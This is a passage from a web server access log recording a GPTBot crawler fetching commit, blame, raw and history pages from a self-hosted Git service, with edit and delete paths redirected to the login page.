GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:11:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10936] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs" -[17/Feb/2026:15:11:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11103] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:11:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10907] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs" -[17/Feb/2026:15:11:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14644] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:11:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/status.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/status.json" -[17/Feb/2026:15:11:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/status.json" -[17/Feb/2026:15:11:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/status.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/status.json" -[17/Feb/2026:15:11:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/status.json" -[17/Feb/2026:15:11:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10936] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs" -[17/Feb/2026:15:11:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/requirements.txt?display=source" [Client 74.7.227.38] [Length 11374] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/requirements.txt" -[17/Feb/2026:15:11:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/database.sqlite?display=rendered" [Client 74.7.227.38] [Length 10882] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/database.sqlite" -[17/Feb/2026:15:11:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/metadata.json" [Client 74.7.227.38] [Length 11489] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" -[17/Feb/2026:15:11:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 11756] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project" -[17/Feb/2026:15:11:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9934] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" -[17/Feb/2026:15:11:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:11:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9902] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" -[17/Feb/2026:15:11:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20386] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:11:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:11:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" -[17/Feb/2026:15:11:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11072] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" -[17/Feb/2026:15:11:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11042] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" -[17/Feb/2026:15:11:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:11:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/metadata.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/metadata.json" -[17/Feb/2026:15:11:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/metadata.json" -[17/Feb/2026:15:11:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/metadata.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/metadata.json" -[17/Feb/2026:15:11:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/metadata.json" -[17/Feb/2026:15:11:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-next-todo.md" -[17/Feb/2026:15:11:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/metadata.json" [Client 74.7.227.38] [Length 9771] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/metadata.json" -[17/Feb/2026:15:11:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 12892] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-next-todo.md" -[17/Feb/2026:15:11:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" -[17/Feb/2026:15:11:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9931] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" -[17/Feb/2026:15:11:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10024] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:11:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11072] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" -[17/Feb/2026:15:11:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:11:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" -[17/Feb/2026:15:11:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/metadata.json" -[17/Feb/2026:15:11:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/metadata.json" [Client 74.7.227.38] [Length 812] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/metadata.json" -[17/Feb/2026:15:11:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 1924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-next-todo.md" -[17/Feb/2026:15:12:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 12894] [Gzip 6.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-next-todo.md" -[17/Feb/2026:15:12:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 12861] [Gzip 6.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-next-todo.md" -[17/Feb/2026:15:12:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2ftemplates%2findex.html" [Client 74.7.227.38] [Length 31836] [Gzip 7.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" -[17/Feb/2026:15:12:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/metadata.json" [Client 74.7.227.38] [Length 10607] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/metadata.json" -[17/Feb/2026:15:12:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/main.py?display=source" [Client 74.7.227.38] [Length 21515] [Gzip 6.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/main.py" -[17/Feb/2026:15:12:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project" [Client 74.7.227.38] [Length 9864] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" -[17/Feb/2026:15:12:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project" [Client 74.7.227.38] [Length 9865] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" -[17/Feb/2026:15:12:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project" [Client 74.7.227.38] [Length 10811] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" -[17/Feb/2026:15:12:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project" [Client 74.7.227.38] [Length 10801] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" -[17/Feb/2026:15:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project" [Client 74.7.227.38] [Length 10828] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" -[17/Feb/2026:15:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project" [Client 74.7.227.38] [Length 10800] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" -[17/Feb/2026:15:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/.vscode/settings.json" [Client 74.7.227.38] [Length 11086] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/.vscode" -[17/Feb/2026:15:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11722] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode" -[17/Feb/2026:15:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11751] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode" -[17/Feb/2026:15:12:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/metadata.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/metadata.json" -[17/Feb/2026:15:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/metadata.json" -[17/Feb/2026:15:12:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/metadata.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 